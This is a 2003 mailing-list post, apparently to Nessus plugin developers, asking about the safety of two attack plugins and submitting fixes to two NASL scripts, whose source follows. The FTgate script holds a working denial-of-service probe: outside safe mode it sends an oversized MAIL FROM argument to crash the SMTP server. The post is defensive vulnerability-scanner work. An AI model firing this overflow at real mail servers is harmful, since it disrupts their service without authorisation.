Hi, First, a question regarding: 11391 BSD ftpd setproctitle() format string 11495 tanned format string vulnerability These are listed as ACT_ATTACK, but looking at the source I am a little worried they could crash servers. Can anyone confirm these are safe to run against vulnerable hosts? And two plugin changes: 11579 - Added an exit(0) line. This is important, as previously the script would run the attack even in safe mode. 11591 - Fixed bug where it always gave its security warning on port 1. Regards, Paul -- Paul Johnston Internet Security Specialist Westpoint Limited Albion Wharf, 19 Albion Street, Manchester, M1 5LN England Tel: +44 (0)161 237 1028 Fax: +44 (0)161 237 1031 email: paulat_private web: www.westpoint.ltd.uk # # This script was written by Renaud Deraison <deraisonat_private> # # See the Nessus Scripts License for details # if(description) { script_id(11591); script_bugtraq_id(7354); script_version ("$Revision: 1.1 $"); name["english"] = "12Planet Chat Server ClearText Password"; script_name(english:name["english"]); desc["english"] = " The remote host is running 12Planet Chat Server - a web based chat server written in Java. The connection to this server is done over clear text, which means that an attacker who can sniff the data going to this host could obtain the administrator password of the web site, and use it to gain unauthorized access to this chat server. Solution : None at this time Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "Checks for the data encapsulation of 12Planet Chat Server"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison"); family["english"] = "Misc."; script_family(english:family["english"]); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 8080); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); include("misc_func.inc"); ports = add_port_in_list(list:get_kb_list("Services/www"), port:8080); foreach port (ports) { if(get_port_state(port)) { req = http_get(item:"/", port:port); res = http_keepalive_send_recv(port:port, data:req); if(res != NULL && "one2planet.tools.PSDynPage" >< res) { if(get_port_transport(port) == ENCAPS_IP){ security_warning(port); exit(0); } } } } # # This script was written by Renaud Deraison <deraisonat_private> # # See the Nessus Scripts License for details # # Ref: # From: "Dennis Rand" <derat_private> # To: "Vulnwatch@Vulnwatch. Org" <vulnwatchat_private>, # Date: Tue, 6 May 2003 14:57:25 +0200 # Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328) if(description) { script_id(11579); script_version ("$Revision: 1.1 $"); name["english"] = "FTgate DoS"; script_name(english:name["english"]); desc["english"] = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 Risk Factor : Serious"; script_description(english:desc["english"]); summary["english"] = "Checks for FTgate"; script_summary(english:summary["english"]); script_category(ACT_MIXED_ATTACK); script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison", francais:"Ce script est Copyright (C) 2003 Renaud Deraison"); family["english"] = "Denial of Service"; script_family(english:family["english"]); script_dependencie("find_service.nes"); script_require_ports("Services/smtp", 25); exit(0); } # # The script code starts here # include("smtp_func.inc"); port = get_kb_item("Services/smtp"); if(!port)port = 25; banner = get_smtp_banner(port:port); if(banner) { if("FTGatePro" >< banner) { if(safe_checks()) { report = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. *** Since safe checks are enabled, Nessus could not verify this *** flaw nor the version of the remote FTGatePro server, so this *** might be a false positive Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 Risk Factor : Serious"; security_hole(port:port, data:report); exit(0); } soc = open_sock_tcp(port); if(!soc)exit(0); r = smtp_recv_banner(socket:soc); if("FTGatePro" >!< r) exit(0); # ??? send(socket:soc, data:string("HELO there\r\n")); r = recv_line(socket:soc, length:4096); send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n")); r = recv_line(socket:soc, length:4096, timeout:1); close(soc); soc = open_sock_tcp(port); if(!soc){ security_hole(port); exit(0); } r = smtp_recv_banner(socket:soc); if(!r)security_hole(port); close(soc); } }
This archive was generated by hypermail 2b30 : Wed Sep 17 2003 - 03:28:53 PDT